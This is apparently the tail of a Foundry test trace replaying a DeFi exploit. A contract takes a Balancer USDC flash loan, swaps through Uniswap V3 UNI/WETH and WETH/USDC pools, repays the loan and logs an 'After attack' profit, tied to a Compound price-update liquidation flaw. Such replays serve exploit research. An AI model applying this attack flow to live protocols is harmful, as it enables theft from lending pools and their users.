    │   │   │   │   │   @ 0x4fb66b896fddf3708da281eec5e36eecf339a2120d959d3722b0cad4c162d74b: 24002 → 24003
    │   │   │   │   │   @ 9: 0x00000000000000000000000000000000000000000000000000000000012625e3 → 0x0000000000000000000000000000000000000000000000000000000001265b28
    │   │   │   │   │   @ 11: 0x00000000000000000000000000000000000000000000351a5bc549cc141b4a0a → 0x00000000000000000000000000000000000000000000394f04bc6feaef527607
    │   │   │   │   └─ ← [Return] 0
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [797] uni::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 19788000000000000000000 [1.978e22]
    │   │   ├─ [158937] UNI_WETH_Pool::swap(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true, 19788000000000000000000 [1.978e22], 42095128740 [4.209e10], 0x)
    │   │   │   ├─ [29962] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 65855246851492826558 [6.585e19])
    │   │   │   │   ├─ emit Transfer(from: UNI_WETH_Pool: [0x1d42064Fc4Beb5F8aAF85F4617AE8b3b5B8Bd801], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 65855246851492826558 [6.585e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000391ecd6186ae44dbe
    │   │   │   │   │   @ 0xb884b91182324d70fdc7c8411c40d802e62f41c4ddf8f831a011e7cd7c4072f1: 0x0000000000000000000000000000000000000000000000b731a698cee14659fc → 0x0000000000000000000000000000000000000000000000b39fb9c2b676620c3e
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2797] uni::balanceOf(UNI_WETH_Pool: [0x1d42064Fc4Beb5F8aAF85F4617AE8b3b5B8Bd801]) [staticcall]
    │   │   │   │   └─ ← [Return] 1398001398601504672478824 [1.398e24]
    │   │   │   ├─ [33865] ContractTest::uniswapV3SwapCallback(19788000000000000000000 [1.978e22], -65855246851492826558 [-6.585e19], 0x)
    │   │   │   │   ├─ [9662] uni::transfer(UNI_WETH_Pool: [0x1d42064Fc4Beb5F8aAF85F4617AE8b3b5B8Bd801], 19788000000000000000000 [1.978e22])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: UNI_WETH_Pool: [0x1d42064Fc4Beb5F8aAF85F4617AE8b3b5B8Bd801], value: 19788000000000000000000 [1.978e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0x000000000000000000000000000000000000000000000430b5aa46aec5b00000 → 0
    │   │   │   │   │   │   @ 0x60cff0c23fc1da8f79d34e3688edc4bc06ef31879f0820ff513318f2bfefa8e1: 0x000000000000000000000000000000000000000000012809cec3cb364a147668 → 0x000000000000000000000000000000000000000000012c3a846e11e50fc47668
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 42: 0 → 1
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [797] uni::balanceOf(UNI_WETH_Pool: [0x1d42064Fc4Beb5F8aAF85F4617AE8b3b5B8Bd801]) [staticcall]
    │   │   │   │   └─ ← [Return] 1417789398601504672478824 [1.417e24]
    │   │   │   ├─ emit Swap(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 19788000000000000000000 [1.978e22], param3: -65855246851492826558 [-6.585e19], param4: 4568522432723418439323217492 [4.568e27], param5: 291252835944559819464790 [2.912e23], param6: -57066 [-5.706e4])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 4: 0x000000000000000000000000000000000000000000003d182b8b4811dfece0ea → 0x000000000000000000000000000000000000000000003dacd90e3feac245a056
    │   │   │   │   @ 1: 0x00000000000000000000000000000001fe5759441bb6625418f0839f269fcb23 → 0x00000000000000000000000000000001fe64bbbfedc91b38b85c9a76b6e96824
    │   │   │   │   @ 0x2fd001a4ba34c4a16dfe4e09bc7a6a4c7e77e9d25707865d0d36bc07025807e9: 0x00000000000000000000000000000001fc1b008af115f128d8bd7803127d1549 → 0x00000000000000000000000000000000023e846773ddfe18762c5ce194b1c4dc
    │   │   │   │   @ 0: 0x000100012c012c006fff216400000000000000000ed1d76e7193959df67077ec → 0x000100012c012c006fff211600000000000000000ec2fe4154936e101ed3ee54
    │   │   │   │   @ 0x24a22e16b21307b87d2d45e013c273ca1e6e3dd85f133da2772babb457d79343: 0x00000000000000000000000000000000009287c632dc41ddd5c9af59fa77cb0d → 0x000000000000000000000000000000000184baeb64eb7a10d246ce311ffd0f4d
    │   │   │   │   @ 0x2fd001a4ba34c4a16dfe4e09bc7a6a4c7e77e9d25707865d0d36bc07025807eb: 0x0165d41d8f0000000000000000000a26a238bb179f9873f83bfffb95cb271ff2 → 0x0100048f9c00000000000000000000000a98ea1e38ac2d5a8cfffffc0a0f009c
    │   │   │   │   @ 0x24a22e16b21307b87d2d45e013c273ca1e6e3dd85f133da2772babb457d79344: 0x0162b01e9a0000000000000000000a15f51792d989837ba306fffe19d2aa02ef → 0x0103288e910000000000000000000010b7ba125c4ec125afc1fffd78028c1d9f
    │   │   │   │   @ 0x2fd001a4ba34c4a16dfe4e09bc7a6a4c7e77e9d25707865d0d36bc07025807ea: 0x00000000000000000000000000000000021550a44c88613fe76764f1efc7c93c → 0x000000000000000000000000000000000001f20d4b3f5aaec0a918992aad111e
    │   │   │   │   @ 0x24a22e16b21307b87d2d45e013c273ca1e6e3dd85f133da2772babb457d79342: 0x00000000000000000000000000000000cd38884d69c72a7ea877758e91fc1726 → 0x00000000000000000000000000000001312b3a4b0c54c7626475aa8d0943fc12
    │   │   │   └─ ← [Return] 19788000000000000000000 [1.978e22], -65855246851492826558 [-6.585e19]
    │   │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 65855246851492826558 [6.585e19]
    │   │   ├─ [105971] WETH_USDC_Pool::swap(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], false, 65855246851492826558 [6.585e19], 1461446703485210103287273052203988822378723970341 [1.461e48], 0x)
    │   │   │   ├─ [30152] USDC::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 194293561859 [1.942e11])
    │   │   │   │   ├─ [29363] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 194293561859 [1.942e11]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: WETH_USDC_Pool: [0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 194293561859 [1.942e11])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x0000000000000000000000000000000000000000000000000000002d3ccc7a03
    │   │   │   │   │   │   @ 0x1f21a62c4538bacf2aabeca410f0fe63151869f172e03c0e00357ba26a341eff: 0x000000000000000000000000000000000000000000000000000063423302f7b8 → 0x00000000000000000000000000000000000000000000000000006314f6367db5
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2534] WETH::balanceOf(WETH_USDC_Pool: [0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640]) [staticcall]
    │   │   │   │   └─ ← [Return] 7882317582390627050549 [7.882e21]
    │   │   │   ├─ [8001] ContractTest::uniswapV3SwapCallback(-194293561859 [-1.942e11], 65855246851492826558 [6.585e19], 0x)
    │   │   │   │   ├─ [6062] WETH::transfer(WETH_USDC_Pool: [0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640], 65855246851492826558 [6.585e19])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: WETH_USDC_Pool: [0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640], value: 65855246851492826558 [6.585e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x390f6178407c9b8e95802b8659e6df8e34c1e3d4f8d6a49e6132bbcdd937b63a: 0x0000000000000000000000000000000000000000000001ab4d217ee03926a435 → 0x0000000000000000000000000000000000000000000001aedf0e54f8a40af1f3
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000391ecd6186ae44dbe → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [534] WETH::balanceOf(WETH_USDC_Pool: [0x88e6A0c2dDD26FEEb64F039a2c41296FcB3f5640]) [staticcall]
    │   │   │   │   └─ ← [Return] 7948172829242119877107 [7.948e21]
    │   │   │   ├─ emit Swap(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: -194293561859 [-1.942e11], param3: 65855246851492826558 [6.585e19], param4: 1458476227940452874857511073102505 [1.458e33], param5: 14522092509184010783 [1.452e19], param6: 196421 [1.964e5])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xa99c246bf102f1a2c53a06c162e7c901706b8b88fba61007675fdcee84cf6815: 0x000000000000000000000000000000000000033057c35eb4632b35bb668eb819 → 0x0000000000000000000000000000000000007eb70efd78d7f5a36502cdd5421d
    │   │   │   │   @ 2: 0x00000000000000000000000000000e8efe38e05921cfdb00f53beeb69a43d6cc → 0x00000000000000000000000000000e8efeee909f6ea8878c1ebfb7677d170fcb
    │   │   │   │   @ 0: 0x00010002d302d300e302ff3f00000000000047e304202a3d1386af15612f4d5e → 0x00010002d302d300e302ff4500000000000047e88edb9f2f2371ee1c0ba83aa9
    │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000009b50f365e14c1300 → 0x000000000000000000000000000000000000000000000000c988d6321d462a1f
    │   │   │   │   @ 0xa99c246bf102f1a2c53a06c162e7c901706b8b88fba61007675fdcee84cf6817: 0x0100370128000000000000000000683e3db31d1de18316fe0c0000a64f0bc704 → 0x0165a1ac030000000000000001eb046366848a9b204943a304000f6c772b9017
    │   │   │   │   @ 0xa99c246bf102f1a2c53a06c162e7c901706b8b88fba61007675fdcee84cf6816: 0x0000000000000000000000000000004a4f83f97fc78f4fa11e1eeefd1be81b8d → 0x00000000000000000000000000000e44af4532172941c2048ef2ef0e979deb92
    │   │   │   └─ ← [Return] -194293561859 [-1.942e11], 65855246851492826558 [6.585e19]
    │   │   ├─ [5452] USDC::transfer(Balancer vault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], 193020254960 [1.93e11])
    │   │   │   ├─ [4663] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transfer(Balancer vault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], 193020254960 [1.93e11]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Balancer vault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], value: 193020254960 [1.93e11])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x231554ca30e30e3daf1985a58abe660eac42605fd6c849ff49b261c6a9f01b7d: 0x000000000000000000000000000000000000000000000000000009b34e1f1a54 → 0x000000000000000000000000000000000000000000000000000009e03f067544
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x0000000000000000000000000000000000000000000000000000002d3ccc7a03 → 0x000000000000000000000000000000000000000000000000000000004be51f13
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x9eec21cbcbe49a9595d7eb0824a6fc04dcfce1a0d64ac8f4a4b1b817bc98b016: 0 → 0x0000000000000000000000000000000000000000000000000000002cf0e75af0
    │   │   │   @ 0: 0x00000002d302d300e302ff4500000000000047e88edb9f2f2371ee1c0ba83aa9 → 0x00010002d302d300e302ff4500000000000047e88edb9f2f2371ee1c0ba83aa9
    │   │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0cf: 0 → 0x00000000000000000000000039aa39c021dfbae8fac545936693ac917d5e7563
    │   │   └─ ← [Stop]
    │   ├─ [1339] USDC::balanceOf(Balancer vault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(Balancer vault: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [delegatecall]
    │   │   │   └─ ← [Return] 10858734712132 [1.085e13]
    │   │   └─ ← [Return] 10858734712132 [1.085e13]
    │   ├─ emit FlashLoan(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], param2: 193020254960 [1.93e11], param3: 0)
    │   └─ ← [Stop]
    ├─ [1339] USDC::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 1273306899 [1.273e9]
    │   └─ ← [Return] 1273306899 [1.273e9]
    ├─ emit log_named_decimal_uint(key: "   [INFO] After attack", val: 1273306899 [1.273e9], decimals: 6)
    ├─ [0] console::log("When compound update the price, incomplete liquidation leading to bad debts") [staticcall]
    │   └─ ← [Stop]
    ├─  storage changes:
    │   @ 0: 2 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 29.37s (27.95s CPU time)

Ran 2 test suites in 30.21s (29.99s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
